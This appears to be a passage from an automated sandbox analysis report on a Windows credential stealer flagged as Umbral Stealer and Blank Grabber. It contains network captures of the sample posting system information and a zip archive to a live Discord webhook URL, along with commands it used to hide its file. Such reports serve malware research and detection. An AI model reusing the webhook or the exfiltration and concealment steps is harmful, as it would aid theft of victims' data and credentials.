                                             Aug 5, 2024 14:58:57.814187050 CEST | 443 | 49707 | 162.159.138.232 | 192.168.2.7
                                             Aug 5, 2024 14:58:57.814506054 CEST | 443 | 49707 | 162.159.138.232 | 192.168.2.7
                                             Aug 5, 2024 14:58:57.822582960 CEST | 49707 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:57.822725058 CEST | 49700 | 80 | 192.168.2.7 | 208.95.112.1
                                             Aug 5, 2024 14:58:57.830672026 CEST | 80 | 49700 | 208.95.112.1 | 192.168.2.7
                                             Aug 5, 2024 14:58:57.830733061 CEST | 49700 | 80 | 192.168.2.7 | 208.95.112.1
                                             Aug 5, 2024 14:58:57.868499041 CEST | 443 | 49707 | 162.159.138.232 | 192.168.2.7
                                             Aug 5, 2024 14:58:57.936718941 CEST | 443 | 49707 | 162.159.138.232 | 192.168.2.7
                                             Aug 5, 2024 14:58:57.940262079 CEST | 49707 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:57.940268993 CEST | 443 | 49707 | 162.159.138.232 | 192.168.2.7
                                             Aug 5, 2024 14:58:58.214941978 CEST | 443 | 49707 | 162.159.138.232 | 192.168.2.7
                                             Aug 5, 2024 14:58:58.215061903 CEST | 443 | 49707 | 162.159.138.232 | 192.168.2.7
                                             Aug 5, 2024 14:58:58.215276957 CEST | 49707 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:58.216696978 CEST | 49707 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:58.217737913 CEST | 49708 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:58.217757940 CEST | 443 | 49708 | 162.159.138.232 | 192.168.2.7
                                             Aug 5, 2024 14:58:58.217830896 CEST | 49708 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:58.218101025 CEST | 49708 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:58.218115091 CEST | 443 | 49708 | 162.159.138.232 | 192.168.2.7
                                             Aug 5, 2024 14:58:58.695410013 CEST | 443 | 49708 | 162.159.138.232 | 192.168.2.7
                                             Aug 5, 2024 14:58:58.696702957 CEST | 49708 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:58.696717978 CEST | 443 | 49708 | 162.159.138.232 | 192.168.2.7
                                             Aug 5, 2024 14:58:58.815581083 CEST | 443 | 49708 | 162.159.138.232 | 192.168.2.7
                                             Aug 5, 2024 14:58:58.815953016 CEST | 49708 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:58.815970898 CEST | 443 | 49708 | 162.159.138.232 | 192.168.2.7
                                             Aug 5, 2024 14:58:58.816015959 CEST | 49708 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:58.816020012 CEST | 443 | 49708 | 162.159.138.232 | 192.168.2.7
                                             Aug 5, 2024 14:58:58.816082001 CEST | 49708 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:58.816095114 CEST | 443 | 49708 | 162.159.138.232 | 192.168.2.7
                                             Aug 5, 2024 14:58:58.816198111 CEST | 49708 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:58.816209078 CEST | 443 | 49708 | 162.159.138.232 | 192.168.2.7
                                             Aug 5, 2024 14:58:58.816220999 CEST | 49708 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:58.816230059 CEST | 443 | 49708 | 162.159.138.232 | 192.168.2.7
                                             Aug 5, 2024 14:58:58.816348076 CEST | 49708 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:58.816361904 CEST | 443 | 49708 | 162.159.138.232 | 192.168.2.7
                                             Aug 5, 2024 14:58:58.816400051 CEST | 49708 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:58.816412926 CEST | 443 | 49708 | 162.159.138.232 | 192.168.2.7
                                             Aug 5, 2024 14:58:58.816454887 CEST | 49708 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:58.816466093 CEST | 443 | 49708 | 162.159.138.232 | 192.168.2.7
                                             Aug 5, 2024 14:58:58.816517115 CEST | 49708 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:58.816523075 CEST | 443 | 49708 | 162.159.138.232 | 192.168.2.7
                                             Aug 5, 2024 14:58:58.816543102 CEST | 49708 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:58.816553116 CEST | 443 | 49708 | 162.159.138.232 | 192.168.2.7
                                             Aug 5, 2024 14:58:58.816602945 CEST | 49708 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:58.816616058 CEST | 443 | 49708 | 162.159.138.232 | 192.168.2.7
                                             Aug 5, 2024 14:58:58.816652060 CEST | 49708 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:58.816663027 CEST | 443 | 49708 | 162.159.138.232 | 192.168.2.7
                                             Aug 5, 2024 14:58:58.816709995 CEST | 49708 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:58.816720963 CEST | 443 | 49708 | 162.159.138.232 | 192.168.2.7
                                             Aug 5, 2024 14:58:58.816759109 CEST | 49708 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:58.816771030 CEST | 443 | 49708 | 162.159.138.232 | 192.168.2.7
                                             Aug 5, 2024 14:58:58.816816092 CEST | 49708 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:58.816821098 CEST | 443 | 49708 | 162.159.138.232 | 192.168.2.7
                                             Aug 5, 2024 14:58:58.816837072 CEST | 49708 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:58.816848040 CEST | 443 | 49708 | 162.159.138.232 | 192.168.2.7
                                             Aug 5, 2024 14:58:58.816904068 CEST | 49708 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:58.816915035 CEST | 443 | 49708 | 162.159.138.232 | 192.168.2.7
                                             Aug 5, 2024 14:58:58.816947937 CEST | 49708 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:58.816965103 CEST | 443 | 49708 | 162.159.138.232 | 192.168.2.7
                                             Aug 5, 2024 14:58:58.817011118 CEST | 49708 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:58.817017078 CEST | 443 | 49708 | 162.159.138.232 | 192.168.2.7
                                             Aug 5, 2024 14:58:58.817027092 CEST | 49708 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:58.817034006 CEST | 443 | 49708 | 162.159.138.232 | 192.168.2.7
                                             Aug 5, 2024 14:58:58.817045927 CEST | 49708 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:58.817050934 CEST | 443 | 49708 | 162.159.138.232 | 192.168.2.7
                                             Aug 5, 2024 14:58:58.817126036 CEST | 49708 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:58.817137957 CEST | 443 | 49708 | 162.159.138.232 | 192.168.2.7
                                             Aug 5, 2024 14:58:58.817182064 CEST | 49708 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:58.817240000 CEST | 49708 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:58.817272902 CEST | 49708 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:58.817333937 CEST | 49708 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:58.817388058 CEST | 49708 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:58.826386929 CEST | 443 | 49708 | 162.159.138.232 | 192.168.2.7
                                             Aug 5, 2024 14:58:58.826522112 CEST | 49708 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:58.826534033 CEST | 443 | 49708 | 162.159.138.232 | 192.168.2.7
                                             Aug 5, 2024 14:58:58.826580048 CEST | 49708 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:58.826591969 CEST | 443 | 49708 | 162.159.138.232 | 192.168.2.7
                                             Aug 5, 2024 14:58:58.826657057 CEST | 49708 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:58.826668978 CEST | 443 | 49708 | 162.159.138.232 | 192.168.2.7
                                             Aug 5, 2024 14:58:58.826709986 CEST | 49708 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:58.826766014 CEST | 49708 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:58.826814890 CEST | 49708 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:58.826859951 CEST | 49708 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:58.826905012 CEST | 49708 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:58.832298994 CEST | 443 | 49708 | 162.159.138.232 | 192.168.2.7
                                             Aug 5, 2024 14:58:58.832423925 CEST | 49708 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:58.832433939 CEST | 443 | 49708 | 162.159.138.232 | 192.168.2.7
                                             Aug 5, 2024 14:58:58.832453012 CEST | 49708 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:58.832462072 CEST | 443 | 49708 | 162.159.138.232 | 192.168.2.7
                                             Aug 5, 2024 14:58:58.832541943 CEST | 49708 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:58.832560062 CEST | 443 | 49708 | 162.159.138.232 | 192.168.2.7
                                             Aug 5, 2024 14:58:58.832576036 CEST | 49708 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:58.832587004 CEST | 443 | 49708 | 162.159.138.232 | 192.168.2.7
                                             Aug 5, 2024 14:58:58.832644939 CEST | 49708 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:58.832659960 CEST | 443 | 49708 | 162.159.138.232 | 192.168.2.7
                                             Aug 5, 2024 14:58:58.832695961 CEST | 49708 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:58.832706928 CEST | 443 | 49708 | 162.159.138.232 | 192.168.2.7
                                             Aug 5, 2024 14:58:58.832763910 CEST | 49708 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:58.832844973 CEST | 49708 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:58.832855940 CEST | 49708 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:58.836548090 CEST | 443 | 49708 | 162.159.138.232 | 192.168.2.7
                                             Aug 5, 2024 14:58:58.836611986 CEST | 49708 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:58.838390112 CEST | 443 | 49708 | 162.159.138.232 | 192.168.2.7
                                            Aug 5, 2024 14:58:59.632831097 CEST44349708162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:59.632982016 CEST44349708162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:59.633037090 CEST49708443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:59.633621931 CEST49708443192.168.2.7162.159.138.232
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 5, 2024 14:58:03.719536066 CEST | 50349 | 53 | 192.168.2.7 | 1.1.1.1
Aug 5, 2024 14:58:03.733005047 CEST | 53 | 50349 | 1.1.1.1 | 192.168.2.7
Aug 5, 2024 14:58:37.710249901 CEST | 62400 | 53 | 192.168.2.7 | 1.1.1.1
Aug 5, 2024 14:58:37.717634916 CEST | 53 | 62400 | 1.1.1.1 | 192.168.2.7
Aug 5, 2024 14:58:57.337081909 CEST | 60083 | 53 | 192.168.2.7 | 1.1.1.1
Aug 5, 2024 14:58:57.344789982 CEST | 53 | 60083 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Aug 5, 2024 14:58:03.719536066 CEST | 192.168.2.7 | 1.1.1.1 | 0x6f7e | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Aug 5, 2024 14:58:37.710249901 CEST | 192.168.2.7 | 1.1.1.1 | 0xfabb | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Aug 5, 2024 14:58:57.337081909 CEST | 192.168.2.7 | 1.1.1.1 | 0xf6fb | Standard query (0) | ptb.discord.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Aug 5, 2024 14:58:03.733005047 CEST | 1.1.1.1 | 192.168.2.7 | 0x6f7e | No error (0) | ip-api.com |  | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Aug 5, 2024 14:58:37.717634916 CEST | 1.1.1.1 | 192.168.2.7 | 0xfabb | No error (0) | ip-api.com |  | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Aug 5, 2024 14:58:57.344789982 CEST | 1.1.1.1 | 192.168.2.7 | 0xf6fb | No error (0) | ptb.discord.com |  | 162.159.138.232 | A (IP address) | IN (0x0001) | false
Aug 5, 2024 14:58:57.344789982 CEST | 1.1.1.1 | 192.168.2.7 | 0xf6fb | No error (0) | ptb.discord.com |  | 162.159.136.232 | A (IP address) | IN (0x0001) | false
Aug 5, 2024 14:58:57.344789982 CEST | 1.1.1.1 | 192.168.2.7 | 0xf6fb | No error (0) | ptb.discord.com |  | 162.159.135.232 | A (IP address) | IN (0x0001) | false
Aug 5, 2024 14:58:57.344789982 CEST | 1.1.1.1 | 192.168.2.7 | 0xf6fb | No error (0) | ptb.discord.com |  | 162.159.128.233 | A (IP address) | IN (0x0001) | false
Aug 5, 2024 14:58:57.344789982 CEST | 1.1.1.1 | 192.168.2.7 | 0xf6fb | No error (0) | ptb.discord.com |  | 162.159.137.232 | A (IP address) | IN (0x0001) | false
                                            • ptb.discord.com
                                            • ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49700 | 208.95.112.1 | 80 | 5076 | C:\Users\user\Desktop\IDLBk4XMUa.exe
Timestamp | Bytes transferred | Direction | Data
Aug 5, 2024 14:58:03.744220972 CEST | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
                                            Host: ip-api.com
                                            Connection: Keep-Alive
Aug 5, 2024 14:58:04.258070946 CEST | 175 | IN | HTTP/1.1 200 OK
                                            Date: Mon, 05 Aug 2024 12:58:03 GMT
                                            Content-Type: text/plain; charset=utf-8
                                            Content-Length: 6
                                            Access-Control-Allow-Origin: *
                                            X-Ttl: 60
                                            X-Rl: 44
                                            Data Raw: 66 61 6c 73 65 0a
                                            Data Ascii: false


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49705 | 208.95.112.1 | 80 | 5076 | C:\Users\user\Desktop\IDLBk4XMUa.exe
Timestamp | Bytes transferred | Direction | Data
Aug 5, 2024 14:58:37.723392963 CEST | 55 | OUT | GET /json/?fields=225545 HTTP/1.1
                                            Host: ip-api.com
Aug 5, 2024 14:58:38.275398016 CEST | 379 | IN | HTTP/1.1 200 OK
                                            Date: Mon, 05 Aug 2024 12:58:37 GMT
                                            Content-Type: application/json; charset=utf-8
                                            Content-Length: 202
                                            Access-Control-Allow-Origin: *
                                            X-Ttl: 26
                                            X-Rl: 43
                                            Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d
                                            Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-33.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.33"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49707 | 162.159.138.232 | 443 | 5076 | C:\Users\user\Desktop\IDLBk4XMUa.exe
Timestamp | Bytes transferred | Direction | Data
2024-08-05 12:58:57 UTC | 364 | OUT | POST /api/webhooks/1193833046810566716/Ip5p47J2qEw7d2YvXLGh3HLrizvUKpbZJnMXQxzQS4N9EYMFmhbB3hhBZhMwKm0ApaPL HTTP/1.1
                                            Accept: application/json
                                            User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
                                            Content-Type: application/json; charset=utf-8
                                            Host: ptb.discord.com
                                            Content-Length: 939
                                            Expect: 100-continue
                                            Connection: Keep-Alive
2024-08-05 12:58:57 UTC | 25 | IN | HTTP/1.1 100 Continue
2024-08-05 12:58:57 UTC | 939 | OUT | Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 22 40 65 76 65 72 79 6f 6e 65 22 2c 22 65 6d 62 65 64 73 22 3a 5b 7b 22 74 69 74 6c 65 22 3a 22 55 6d 62 72 61 6c 20 53 74 65 61 6c 65 72 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 2a 2a 5f 5f 53 79 73 74 65 6d 20 49 6e 66 6f 5f 5f 2a 2a 5c 72 5c 6e 60 60 60 61 75 74 6f 68 6f 74 6b 65 79 5c 72 5c 6e 43 6f 6d 70 75 74 65 72 20 4e 61 6d 65 3a 20 38 35 35 32 37 31 5c 72 5c 6e 43 6f 6d 70 75 74 65 72 20 4f 53 3a 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 72 5c 6e 54 6f 74 61 6c 20 4d 65 6d 6f 72 79 3a 20 34 20 47 42 5c 72 5c 6e 55 55 49 44 3a 20 31 39 38 38 32 37 34 32 2d 43 43 35 36 2d 31 41 35 39 2d 39 37 37 39 2d 46 42 38 43 42 46 41 31 45 32 39 44 5c 72 5c 6e 43 50 55 3a 20 49 6e
                                            Data Ascii: {"content":"@everyone","embeds":[{"title":"Umbral Stealer","description":"**__System Info__**\r\n```autohotkey\r\nComputer Name: 855271\r\nComputer OS: Microsoft Windows 10 Pro\r\nTotal Memory: 4 GB\r\nUUID: 19882742-CC56-1A59-9779-FB8CBFA1E29D\r\nCPU: In
2024-08-05 12:58:58 UTC | 1369 | IN | HTTP/1.1 204 No Content
                                            Date: Mon, 05 Aug 2024 12:58:58 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Connection: close
                                            set-cookie: __dcfduid=7a814ee2532a11efa09d826be3208cc7; Expires=Sat, 04-Aug-2029 12:58:58 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                            x-ratelimit-limit: 5
                                            x-ratelimit-remaining: 4
                                            x-ratelimit-reset: 1722862739
                                            x-ratelimit-reset-after: 1
                                            via: 1.1 google
                                            alt-svc: h3=":443"; ma=86400
                                            CF-Cache-Status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WtzklgeSXQGoxuB0NGRMHlbkqXVKxjuYzDE7Q%2BGoGTvX%2FEWCPUOrqR4n27jcmPprci63nBuhFWNhullO2T0dGo3r3jIzD1gw%2FJHuJAwjf7D2kmkVyB4Ry64VURZ6S7bLww%3D%3D"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            X-Content-Type-Options: nosniff
                                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                            Set-Cookie: __sdcfduid=7a814ee2532a11efa09d826be3208cc7956c19817d1b7d5a1a392a7a120d7cbd49d98e0181b32a1cbbb9f1bd86d273af; Expires=Sat, 04-Aug-2029 12:58:58 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                            Set-Cookie: __cfruid=be4db5686074cbc337a6b7e38b8f014842b640ea-1722862738; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                            Set
2024-08-05 12:58:58 UTC | 208 | IN | Data Raw: 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 34 36 77 78 5a 44 4b 6a 51 46 7a 38 4b 50 49 79 58 52 68 77 76 41 77 57 43 70 79 42 46 4b 61 41 2e 69 44 63 56 32 48 6d 73 70 4d 2d 31 37 32 32 38 36 32 37 33 38 30 39 31 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 61 65 36 66 36 32 66 63 66 31 35 30 63 61 63 2d 45 57 52 0d 0a 0d 0a
Data Ascii: -Cookie: _cfuvid=46wxZDKjQFz8KPIyXRhwvAwWCpyBFKaA.iDcV2HmspM-1722862738091-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8ae6f62fcf150cac-EWR


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49708 | 162.159.138.232 | 443 | 5076 | C:\Users\user\Desktop\IDLBk4XMUa.exe
Timestamp | Bytes transferred | Direction | Data
2024-08-05 12:58:58 UTC | 688 | OUT | POST /api/webhooks/1193833046810566716/Ip5p47J2qEw7d2YvXLGh3HLrizvUKpbZJnMXQxzQS4N9EYMFmhbB3hhBZhMwKm0ApaPL HTTP/1.1
                                            Accept: application/json
                                            User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
                                            Content-Type: multipart/form-data; boundary="2c5bd49c-1052-4010-b4fa-7aeaeb7ffcb0"
                                            Host: ptb.discord.com
                                            Cookie: __dcfduid=7a814ee2532a11efa09d826be3208cc7; __sdcfduid=7a814ee2532a11efa09d826be3208cc7956c19817d1b7d5a1a392a7a120d7cbd49d98e0181b32a1cbbb9f1bd86d273af; __cfruid=be4db5686074cbc337a6b7e38b8f014842b640ea-1722862738; _cfuvid=46wxZDKjQFz8KPIyXRhwvAwWCpyBFKaA.iDcV2HmspM-1722862738091-0.0.1.1-604800000
                                            Content-Length: 656125
                                            Expect: 100-continue
2024-08-05 12:58:58 UTC | 25 | IN | HTTP/1.1 100 Continue
2024-08-05 12:58:58 UTC | 40 | OUT | Data Raw: 2d 2d 32 63 35 62 64 34 39 63 2d 31 30 35 32 2d 34 30 31 30 2d 62 34 66 61 2d 37 61 65 61 65 62 37 66 66 63 62 30 0d 0a
Data Ascii: --2c5bd49c-1052-4010-b4fa-7aeaeb7ffcb0
2024-08-05 12:58:58 UTC | 140 | OUT | Data Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 66 69 6c 65 3b 20 66 69 6c 65 6e 61 6d 65 3d 55 6d 62 72 61 6c 2d 38 35 35 32 37 31 2e 7a 69 70 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 55 6d 62 72 61 6c 2d 38 35 35 32 37 31 2e 7a 69 70 0d 0a 0d 0a
Data Ascii: Content-Type: application/zip
Content-Disposition: form-data; name=file; filename=Umbral-855271.zip; filename*=utf-8''Umbral-855271.zip
2024-08-05 12:58:59 UTC | 1369 | IN | HTTP/1.1 200 OK
                                            Date: Mon, 05 Aug 2024 12:58:59 GMT
                                            Content-Type: application/json
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                            x-ratelimit-limit: 5
                                            x-ratelimit-remaining: 4
                                            x-ratelimit-reset: 1722862740
                                            x-ratelimit-reset-after: 1
                                            vary: Accept-Encoding
                                            via: 1.1 google
                                            alt-svc: h3=":443"; ma=86400
                                            CF-Cache-Status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cVbktWOmo2D8GjqCEL1jxbFitZiNdP0aT5WP9vZ9qklLFAr01hTGF1KFBYpI6c9fYLNpvDigHbvbBXCuMaGQRT6VgwipygnTuaFfEeLuwYmiSHLT8%2Bp6iIBUz7I3BRDWyQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            X-Content-Type-Options: nosniff
                                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                            Server: cloudflare
                                            CF-RAY: 8ae6f6354a5f43f2-EWR
                                            45c
                                            {"type":0,"content":"","mentions":[],"mention_roles":[],"attachments":[{"id":"1270003120704983090","filename":"Umbral-855271.zip","size":655901,"url":"https://cdn.discordapp.com/attachments/1193832993945563176/1270003120704983090/Umbral-855271.zip?ex=66b21e13&is=66b0cc93&hm=be1e7659092c45250088e85c2a07821eee84a190c261e79b4ffa4fcffe04dc30&","proxy_url":"https://media.discordapp.net/attachments/1193832993945563176/12700031



                                            Target ID:0
                                            Start time:08:58:00
                                            Start date:05/08/2024
                                            Path:C:\Users\user\Desktop\IDLBk4XMUa.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Users\user\Desktop\IDLBk4XMUa.exe"
                                            Imagebase:0x20096170000
                                            File size:235'008 bytes
                                            MD5 hash:AE3713305401315A3B520E84FB786FE5
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000002.1853846152.00000200980F6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000000.1255622080.0000020096172000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: 00000000.00000000.1255622080.0000020096172000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000002.1853846152.0000020097FEE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1853846152.0000020097FEE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            Target ID:8
                                            Start time:08:58:01
                                            Start date:05/08/2024
                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                            Wow64 process (32bit):false
                                            Commandline:"wmic.exe" csproduct get uuid
                                            Imagebase:0x7ff695ee0000
                                            File size:576'000 bytes
                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            Target ID:9
                                            Start time:08:58:02
                                            Start date:05/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:12
                                            Start time:08:58:03
                                            Start date:05/08/2024
                                            Path:C:\Windows\System32\attrib.exe
                                            Wow64 process (32bit):false
                                            Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\IDLBk4XMUa.exe"
                                            Imagebase:0x7ff78d730000
                                            File size:23'040 bytes
                                            MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            Target ID:13
                                            Start time:08:58:03
                                            Start date:05/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
